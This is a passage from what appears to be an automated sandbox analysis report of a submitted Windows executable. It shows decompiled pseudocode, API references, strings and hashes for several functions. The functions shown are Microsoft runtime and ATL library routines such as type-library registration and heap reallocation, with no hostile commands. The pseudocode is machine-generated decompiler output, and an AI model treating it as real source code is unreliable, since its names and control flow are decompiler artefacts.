                      						L18:
                      						return 0;
                      					}
                      				}
                      				if(_t127 != 0) {
                      					goto L10;
                      				}
                      				_t149 = _a8;
                      				if(_a8 == 0) {
                      					goto L18;
                      				}
                      				goto L3;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$(((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$_mbsnbcpy_s_l$minkernel\crts\ucrt\src\desktopcrt\mbstring\mbsncpy_s.inl
                      • API String ID: 3007373345-974215673
                      • Opcode ID: 93cf4cce85402fe004ae1eb8bd3690e22b4db66f294728211b6b7dae680b61f6
                      • Instruction ID: a1d5456c933b54597f7a9900efe60634aade84ac6e45540c5a5e1537b2a0b305
                      • Opcode Fuzzy Hash: 93cf4cce85402fe004ae1eb8bd3690e22b4db66f294728211b6b7dae680b61f6
                      • Instruction Fuzzy Hash: C4A19BF1E043576BCF21AA2C4C45B7E7B9D9B87728F284665F864AF2D2D6719C0087D0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E0094B3D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v16;
                      				char _v28;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				char _v564;
                      				char _v576;
                      				signed int _v584;
                      				signed int _v589;
                      				struct HINSTANCE__* _v600;
                      				intOrPtr _v604;
                      				signed int _v608;
                      				intOrPtr _v612;
                      				intOrPtr _v616;
                      				void* _v620;
                      				signed int _t72;
                      				void* _t76;
                      				intOrPtr _t82;
                      				void* _t84;
                      				void* _t89;
                      				void* _t98;
                      				struct HINSTANCE__* _t101;
                      				_Unknown_base(*)()* _t103;
                      				signed char _t108;
                      				intOrPtr* _t152;
                      				void* _t154;
                      				void* _t160;
                      				void* _t161;
                      				signed int _t165;
                      				void* _t166;
                      				void* _t167;
                      
                      				_t162 = __esi;
                      				_t120 = __ebx;
                      				_t160 =  &_v620;
                      				memset(_t160, 0xcccccccc, 0x9a << 2);
                      				_t167 = _t166 + 0xc;
                      				_t161 = _t160 + 0x9a;
                      				_t72 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t72 ^ _t165;
                      				E00942ED0( &_v16);
                      				E0094E6E0( &_v28);
                      				_t76 = E0094E760( &_v28);
                      				_v36 = E0094A1D0(__ebx, _a4, _a8, L00942F40( &_v16), _t76);
                      				if(_v36 < 0) {
                      					L18:
                      					_v616 = _v36;
                      					E00946450( &_v28, __eflags);
                      					E009430B0( &_v16, _t162);
                      					_t82 = _v616;
                      					L19:
                      					E009D14C0(_t165, 0x94b68c);
                      					_t84 = _t82;
                      					_t154 = _t152;
                      					return E009D1520(E00957280(_t84, _t120, _v8 ^ _t165, _t154, _t161, _t162), _t165 - _t167 + 0x268);
                      				}
                      				_v40 = 0;
                      				E00942ED0( &_v576);
                      				_v620 = E0094E710( &_v28);
                      				_t89 = L00942F40( &_v576);
                      				_t162 = _t167;
                      				_t152 =  *((intOrPtr*)( *_v620 + 0x24));
                      				_v36 = E009D1520( *_t152(_v620, 0xffffffff, 0, 0, 0, _t89), _t167 - _t167);
                      				_t172 = _v36;
                      				if(_v36 >= 0) {
                      					_t108 = E00943000( &_v576, _t172, 0);
                      					_t173 = _t108 & 0x000000ff;
                      					if((_t108 & 0x000000ff) != 0) {
                      						E00942720(__ebx, _t161, _t162, _t173,  &_v564, 0x104, _v576, E00942EF0( &_v576, _t162));
                      						_t167 = _t167 + 0x10;
                      						_v604 = 0x206;
                      						if(_v604 >= 0x208) {
                      							E00957730();
                      						}
                      						 *((short*)(_t165 + _v604 - 0x230)) = 0;
                      						_v608 = E009CFE00(_t162,  &_v564) << 1;
                      						if(_v608 >= 0x208) {
                      							E00957730();
                      						}
                      						 *((short*)(_t165 + _v608 - 0x230)) = 0;
                      						_t152 = 0;
                      						_v40 = _t165 + 0xfffffffffffffdd0;
                      					}
                      				}
                      				_v584 = 0;
                      				_v589 = 0;
                      				_v36 = E0094A1A0( &_v589);
                      				_t177 = _v36;
                      				if(_v36 >= 0) {
                      					__eflags = (_v589 & 0x000000ff) - 1;
                      					if((_v589 & 0x000000ff) == 1) {
                      						_t101 = GetModuleHandleW(L"OLEAUT32.DLL");
                      						__eflags = _t167 - _t167;
                      						_v600 = E009D1520(_t101, _t167 - _t167);
                      						__eflags = _v600;
                      						if(_v600 != 0) {
                      							_t103 = GetProcAddress(_v600, "RegisterTypeLibForUser");
                      							__eflags = _t167 - _t167;
                      							_v584 = E009D1520(_t103, _t167 - _t167);
                      						}
                      					}
                      					__eflags = _v584;
                      					if(_v584 == 0) {
                      						_t152 = __imp__#163;
                      						_v584 = _t152;
                      					}
                      					_t162 = _t167;
                      					_t98 = _v584(E0094E7B0( &_v28), L00942F30( &_v16), _v40);
                      					__eflags = _t167 - _t167;
                      					_v36 = E009D1520(_t98, _t167 - _t167);
                      					E009430B0( &_v576, _t167);
                      					goto L18;
                      				}
                      				_t152 = _v36;
                      				_v612 = _t152;
                      				E009430B0( &_v576, _t162);
                      				E00946450( &_v28, _t177);
                      				E009430B0( &_v16, _t162);
                      				_t82 = _v612;
                      				goto L19;
                      			}

                      APIs
                      • ~Module.VCCORLIBD ref: 0094B58A
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 0094B5B5
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0094B5DF
                        • Part of subcall function 00942EF0: SysStringLen.OLEAUT32 ref: 00942F07
                        • Part of subcall function 00942720: __wcstombs_l.LIBCMTD ref: 00942733
                      • ~Module.VCCORLIBD ref: 0094B646
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094B663
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$AddressCheckHandleProcStackStringVars@8__wcstombs_l
                      • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
                      • API String ID: 1622416431-2666564778
                      • Opcode ID: c7265341d025c3c4277590cd785b0be0e84d70cdeb4f46fa053b93efcde82032
                      • Instruction ID: 74fcc6131246e847b564ff553720b515605bdfce504d486cdc624fd981f1080d
                      • Opcode Fuzzy Hash: c7265341d025c3c4277590cd785b0be0e84d70cdeb4f46fa053b93efcde82032
                      • Instruction Fuzzy Hash: 70715F719102289FCB24EB64DC59BEEB774BF94300F5042A9E50AB7291DB359E84CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0095C270(intOrPtr _a4, intOrPtr _a8) {
                      				char _v5;
                      				char _v6;
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				intOrPtr* _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      
                      				_v32 = L0095BF40(_a4);
                      				if(_v32 == 0) {
                      					_v44 = E0095C030( &_v5);
                      					_v48 = E0095C020( &_v6);
                      					L0095BF60( &_v12, E0096AC70(0, _a4 + 5, 0, _v48, _v44, 0x2800));
                      					if((L0095BFE0( &_v12) & 0x000000ff) != 0) {
                      						_v16 = E00992E00(E0095C0C0( &_v12));
                      						while(_v16 != 0 &&  *((char*)(E0095C0C0( &_v12) + _v16 - 1)) == 0x20) {
                      							 *((char*)(E0095C0C0( &_v12) + _v16 - 1)) = 0;
                      							_v16 = _v16 - 1;
                      						}
                      						_v36 = _v16 + 1;
                      						_v56 = _v36 + 4;
                      						E0095BF80( &_v20, E00999580(_v56, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_type_info.cpp", 0x66));
                      						if((E0095C000( &_v20) & 0x000000ff) != 0) {
                      							_v24 = E0095C0D0( &_v20);
                      							_v28 = _v24 + 4;
                      							_v64 = 0;
                      							 *_v24 = _v64;
                      							E00992DE0(_v28, _v36, E0095C0C0( &_v12));
                      							_v40 = L0095BF20(_a4, _v28, 0);
                      							if(_v40 == 0) {
                      								E0095C090( &_v20);
                      								__imp__InterlockedPushEntrySList(_a8, _v24);
                      								_v72 = _v28;
                      								E0095BFC0( &_v20);
                      								E0095BFA0( &_v12);
                      								return _v72;
                      							}
                      							_v68 = _v40;
                      							E0095BFC0( &_v20);
                      							E0095BFA0( &_v12);
                      							return _v68;
                      						}
                      						_v60 = 0;
                      						E0095BFC0( &_v20);
                      						E0095BFA0( &_v12);
                      						return _v60;
                      					}
                      					_v52 = 0;
                      					E0095BFA0( &_v12);
                      					return _v52;
                      				}
                      				return _v32;
                      			}

                      APIs
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp, xrefs: 0095C356
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name___un
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
                      • API String ID: 3905892445-4032652797
                      • Opcode ID: 441f38bee04eed8513f7845c7e12ec03f30b31ab5e3050fd2ab236c27af5e4e1
                      • Instruction ID: 38c2ca069c9c5dbde5fb6eec92279621074942ff0b563ee54949b118750dc4fb
                      • Opcode Fuzzy Hash: 441f38bee04eed8513f7845c7e12ec03f30b31ab5e3050fd2ab236c27af5e4e1
                      • Instruction Fuzzy Hash: DD510BB1D00208AFDF08EFA5D891BEEB7B4AF94305F404469F81277291EB356A49CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E0094B1C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				char _v12;
                      				char _v24;
                      				intOrPtr _v32;
                      				char _v40;
                      				signed int _v48;
                      				signed int _v53;
                      				struct HINSTANCE__* _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr* _v76;
                      				void _v80;
                      				void* _t62;
                      				intOrPtr _t68;
                      				void* _t70;
                      				void* _t82;
                      				void* _t87;
                      				struct HINSTANCE__* _t89;
                      				_Unknown_base(*)()* _t91;
                      				intOrPtr _t118;
                      				void* _t135;
                      				void* _t136;
                      				void* _t137;
                      
                      				_t131 = __esi;
                      				memset( &_v80, 0xcccccccc, 0x13 << 2);
                      				_t137 = _t136 + 0xc;
                      				E00942ED0( &_v12);
                      				E0094E6E0( &_v24);
                      				_t62 = E0094E760( &_v24);
                      				_v32 = E0094A1D0(__ebx, _a4, _a8, L00942F40( &_v12), _t62);
                      				if(_v32 < 0) {
                      					L10:
                      					_t118 = _v32;
                      					_v72 = _t118;
                      					E00946450( &_v24, __eflags);
                      					E009430B0( &_v12, _t131);
                      					_t68 = _v72;
                      					L11:
                      					_push(_t118);
                      					E009D14C0(_t135, 0x94b364);
                      					_t70 = _t68;
                      					return E009D1520(_t70, _t135 - _t137 + 0x4c);
                      				}
                      				_v76 = E0094E710( &_v24);
                      				_t131 = _t137;
                      				_v32 = E009D1520( *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x1c))))(_v76,  &_v40), _t137 - _t137);
                      				if(_v32 < 0) {
                      					goto L10;
                      				}
                      				_v48 = 0;
                      				_v53 = 0;
                      				_v32 = E0094A1A0( &_v53);
                      				_t143 = _v32;
                      				if(_v32 >= 0) {
                      					__eflags = (_v53 & 0x000000ff) - 1;
                      					if((_v53 & 0x000000ff) == 1) {
                      						_t89 = GetModuleHandleW(L"OLEAUT32.DLL");
                      						__eflags = _t137 - _t137;
                      						_v64 = E009D1520(_t89, _t137 - _t137);
                      						__eflags = _v64;
                      						if(_v64 != 0) {
                      							_t91 = GetProcAddress(_v64, "UnRegisterTypeLibForUser");
                      							__eflags = _t137 - _t137;
                      							_v48 = E009D1520(_t91, _t137 - _t137);
                      						}
                      					}
                      					__eflags = _v48;
                      					if(_v48 == 0) {
                      						_v48 = __imp__#186;
                      					}
                      					_t82 = _v48(_v40,  *(_v40 + 0x18) & 0x0000ffff,  *(_v40 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_v40 + 0x10)),  *((intOrPtr*)(_v40 + 0x14)));
                      					__eflags = _t137 - _t137;
                      					_v32 = E009D1520(_t82, _t137 - _t137);
                      					_v80 = E0094E710( &_v24);
                      					_t131 = _t137;
                      					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x30))))(_v80, _v40);
                      					__eflags = _t137 - _t137;
                      					E009D1520(_t87, __eflags);
                      					goto L10;
                      				}
                      				_t118 = _v32;
                      				_v68 = _t118;
                      				E00946450( &_v24, _t143);
                      				E009430B0( &_v12, _t131);
                      				_t68 = _v68;
                      				goto L11;
                      			}


























                      APIs
                      • ~Module.VCCORLIBD ref: 0094B26C
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 0094B291
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 0094B2B2
                      • ~Module.VCCORLIBD ref: 0094B331
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094B34B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$AddressCheckFreeHandleProcStackStringVars@8
                      • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
                      • API String ID: 1449819490-2196524522
                      • Opcode ID: 58f2e83c20dc05ab426362073b409c8a59f6ba2627e28ce6e0be2b844bc6373c
                      • Instruction ID: e79604fab72a24265ca2eae20f44feb24ce176a8e81587cda5cca382057bc143
                      • Opcode Fuzzy Hash: 58f2e83c20dc05ab426362073b409c8a59f6ba2627e28ce6e0be2b844bc6373c
                      • Instruction Fuzzy Hash: 62512676D001189FCB18EFA9D891FEEB7B5AF88300F108159E416B7291DB34AE45CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 58%
                      			E0094BF90(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v20;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				char _v44;
                      				intOrPtr _v48;
                      				char _v52;
                      				intOrPtr _t50;
                      				void* _t52;
                      				long _t54;
                      				intOrPtr _t56;
                      				void* _t66;
                      				intOrPtr* _t84;
                      				void* _t90;
                      				void* _t91;
                      				void* _t94;
                      				void* _t95;
                      				void* _t96;
                      
                      				_t84 = __edx;
                      				_t90 =  &_v52;
                      				memset(_t90, 0xcccccccc, 0xc << 2);
                      				_t96 = _t95 + 0xc;
                      				_t91 = _t90 + 0xc;
                      				if(_a4 != 0) {
                      					_v8 = 0;
                      					E00951D00(__ebx,  &_v20, _t91, __esi, _a4 + 4, 0);
                      					__eflags = E00951D90( &_v20, __esi);
                      					if(__eflags >= 0) {
                      						_t84 =  *((intOrPtr*)(_a4 + 0x1c));
                      						_v28 = _t84;
                      						__eflags = _v28;
                      						if(_v28 == 0) {
                      							L16:
                      							_v52 = _v8;
                      							E00951D60( &_v20);
                      							_t50 = _v52;
                      							L17:
                      							_push(_t84);
                      							E009D14C0(_t94, 0x94c0f0);
                      							_t52 = _t50;
                      							return E009D1520(_t52, _t94 - _t96 + 0x30);
                      						}
                      						_t54 = GetCurrentThreadId();
                      						__eflags = _t96 - _t96;
                      						_v32 = E009D1520(_t54, _t96 - _t96);
                      						_v36 = 0;
                      						while(1) {
                      							__eflags = _v28;
                      							if(_v28 == 0) {
                      								goto L16;
                      							}
                      							_t56 = _v28;
                      							__eflags =  *((intOrPtr*)(_t56 + 4)) - _v32;
                      							if( *((intOrPtr*)(_t56 + 4)) != _v32) {
                      								_v36 = _v28;
                      								_t84 = _v28;
                      								_v28 =  *((intOrPtr*)(_t84 + 8));
                      								continue;
                      							}
                      							__eflags = _v36;
                      							if(_v36 != 0) {
                      								 *((intOrPtr*)(_v36 + 8)) =  *((intOrPtr*)(_v28 + 8));
                      							} else {
                      								 *((intOrPtr*)(_a4 + 0x1c)) =  *((intOrPtr*)(_v28 + 8));
                      							}
                      							_t84 = _v28;
                      							_v8 =  *_t84;
                      							goto L16;
                      						}
                      						goto L16;
                      					}
                      					_push("ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData\n");
                      					_push(0);
                      					_push(E0094F1E0(0xb33748));
                      					_push(E009423B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20af));
                      					E009423E0(__ebx, _t91, __esi, __eflags);
                      					_t96 = _t96 + 0x10;
                      					__eflags = 0;
                      					if(0 == 0) {
                      						_t66 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20b0, 0, "%ls", 0x9f40dc);
                      						_t96 = _t96 + 0x18;
                      						__eflags = _t66 - 1;
                      						if(_t66 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_v48 = _v8;
                      					E00951D60( &_v20);
                      					_t50 = _v48;
                      					goto L17;
                      				}
                      				_t50 = 0;
                      				goto L17;
                      			}























                      APIs
                      Strings
                      • %ls, xrefs: 0094C00E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BFEF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C01A
                      • ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData, xrefs: 0094BFD8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData
                      • API String ID: 1089072215-1366296842
                      • Opcode ID: 2517af37d0aeeae0ed7908f883aad4f6c186eaec37e09c1907e1fff0c09b5777
                      • Instruction ID: c79abd3493c4e222cf55676ccfb76bed8cdec50581a81cc9c5e054c3ff4d3bda
                      • Opcode Fuzzy Hash: 2517af37d0aeeae0ed7908f883aad4f6c186eaec37e09c1907e1fff0c09b5777
                      • Instruction Fuzzy Hash: 8B417CB5E00209EFDF54DF94D892FBEB7B4BB88304F10851AE90567382E774A984CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E009483D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				char _v24;
                      				char _v44;
                      				char _v56;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				char _v80;
                      				intOrPtr _v84;
                      				char _v88;
                      				char _v92;
                      				intOrPtr _t60;
                      				void* _t62;
                      				void* _t64;
                      				intOrPtr _t68;
                      				intOrPtr _t78;
                      				intOrPtr _t97;
                      				void* _t101;
                      				void* _t104;
                      				void* _t105;
                      				void* _t106;
                      
                      				_t103 = __esi;
                      				_t74 = __ebx;
                      				_push(__ecx);
                      				_t101 =  &_v92;
                      				memset(_t101, 0xcccccccc, 0x16 << 2);
                      				_t106 = _t105 + 0xc;
                      				_t102 = _t101 + 0x16;
                      				_pop(_t78);
                      				_v8 = _t78;
                      				E009441C0( &_v24, 0);
                      				E0094E200( &_v44);
                      				_v56 = 0;
                      				_t97 = _a8;
                      				_v64 = E00948100(__ebx, _v8, _t97, _t101 + 0x16, __esi, _a12, _t97,  &_v44,  &_v56);
                      				_t110 = _v64;
                      				if(_v64 >= 0) {
                      					_t97 = _a4;
                      					E009442A0( &_v24, _t97);
                      					_v68 = 2;
                      					__eflags = _a4;
                      					if(_a4 != 0) {
                      						__eflags = _v56;
                      						if(__eflags == 0) {
                      							_v88 = _v44;
                      						} else {
                      							_v88 = _v56;
                      						}
                      						_t97 = _v88;
                      						_v68 = E00944A80(_t74,  &_v24, _t102, _t103, __eflags, _t97);
                      					}
                      					__eflags = _v68;
                      					if(__eflags != 0) {
                      						__eflags = _v68 - 2;
                      						if(__eflags != 0) {
                      							__eflags = _v68 - 3;
                      							if(__eflags != 0) {
                      								__eflags = _v56;
                      								if(__eflags == 0) {
                      									_v92 = _v44;
                      								} else {
                      									_v92 = _v56;
                      								}
                      								_t97 = _v92;
                      								_t64 = E0094F1F0(0xb337ac);
                      								E009423E0(_t74, _t102, _t103, __eflags, E009423B0( &_v80, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x1ad), _t64, 0, "Failed to delete key %Ts or one of its subkeys\n", _t97);
                      								_t68 = E00942E00( &_v80, __eflags, _v68);
                      								_t106 = _t106 + 0x18;
                      								_v64 = _t68;
                      							}
                      						}
                      					}
                      					E00944260( &_v24);
                      					_v84 = _v64;
                      					L00951F30( &_v44, __eflags);
                      					E00944220( &_v24, __eflags);
                      					_t60 = _v84;
                      				} else {
                      					_v72 = _v64;
                      					L00951F30( &_v44, _t110);
                      					E00944220( &_v24, _t110);
                      					_t60 = _v72;
                      				}
                      				_push(_t97);
                      				E009D14C0(_t104, 0x948528);
                      				_t62 = _t60;
                      				return E009D1520(_t62, _t104 - _t106 + 0x58);
                      			}

























                      APIs
                      • std::exception::exception.LIBCMTD ref: 009483F8
                        • Part of subcall function 00948100: @_RTC_CheckStackVars@8.LIBCMTD ref: 009482EA
                      • ~Module.VCCORLIBD ref: 00948436
                      • _Smanip.LIBCPMTD ref: 009484C8
                      • ~Module.VCCORLIBD ref: 009484FE
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00948510
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 009484C0
                      • Failed to delete key %Ts or one of its subkeys, xrefs: 009484A9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$Smanipstd::exception::exception
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Failed to delete key %Ts or one of its subkeys
                      • API String ID: 2246551222-193758817
                      • Opcode ID: d9dfefe1d1c3d4062203a2b2459f1a7f25d0b24a6a3afb81c4eb4bba5cad765a
                      • Instruction ID: 1299643fe5adac914d2a58726a55aa31aa478e7382d33dc91d624a8ae0b630d5
                      • Opcode Fuzzy Hash: d9dfefe1d1c3d4062203a2b2459f1a7f25d0b24a6a3afb81c4eb4bba5cad765a
                      • Instruction Fuzzy Hash: 9B410A71D01109EBCB18EFD4E995FEEB7B9AF88304F10412AF5026B291DB706E49CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009ACA20(void* __ecx, void* _a4, signed int _a8) {
                      				long _v8;
                      				long _v12;
                      				signed int _v16;
                      				void* _v20;
                      				long _v24;
                      				long _v28;
                      				void* _t27;
                      				intOrPtr _t33;
                      				signed char _t36;
                      				void* _t44;
                      				void* _t45;
                      				void* _t50;
                      				void* _t53;
                      
                      				_t45 = __ecx;
                      				if(_a4 == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				_t57 = _v12;
                      				if(_v12 == 0) {
                      					_t44 = L00994930(_t57, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0, L"%ls", L"block != nullptr");
                      					_t53 = _t53 + 0x18;
                      					if(_t44 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					__eflags = _a8 - 0xffffffe0;
                      					if(_a8 <= 0xffffffe0) {
                      						_t27 =  *0xb31510; // 0xe60000
                      						_v28 = HeapSize(_t27, 0, _a4);
                      						__eflags = _a8;
                      						if(_a8 != 0) {
                      							_v16 = _a8;
                      						} else {
                      							_v16 = 1;
                      						}
                      						_v24 = _v16;
                      						_t47 = _a4;
                      						_t50 =  *0xb31510; // 0xe60000
                      						_v20 = HeapReAlloc(_t50, 0x10, _a4, _v24);
                      						__eflags = _v20;
                      						if(_v20 == 0) {
                      							__eflags = _v24 - _v28;
                      							if(_v24 > _v28) {
                      								L18:
                      								_t33 = E00992E90(_t47, GetLastError());
                      								 *((intOrPtr*)(L00992F70(_t47))) = _t33;
                      								__eflags = 0;
                      								return 0;
                      							}
                      							_t47 = _v28;
                      							_t36 = E009AC9A0(_v28);
                      							_t53 = _t53 + 4;
                      							__eflags = _t36 & 0x000000ff;
                      							if((_t36 & 0x000000ff) != 0) {
                      								goto L18;
                      							}
                      							return _a4;
                      						} else {
                      							return _v20;
                      						}
                      					}
                      					 *((intOrPtr*)(L00992F70(_t45))) = 0xc;
                      					return 0;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t45))) = 0x16;
                      					E00992900(L"block != nullptr", L"_expand_base", L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0);
                      					return 0;
                      				}
                      			}

                      APIs
                      • HeapSize.KERNEL32(00E60000,00000000,00000000), ref: 009ACAC5
                      • HeapReAlloc.KERNEL32(00E60000,00000010,00000000,?), ref: 009ACAFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
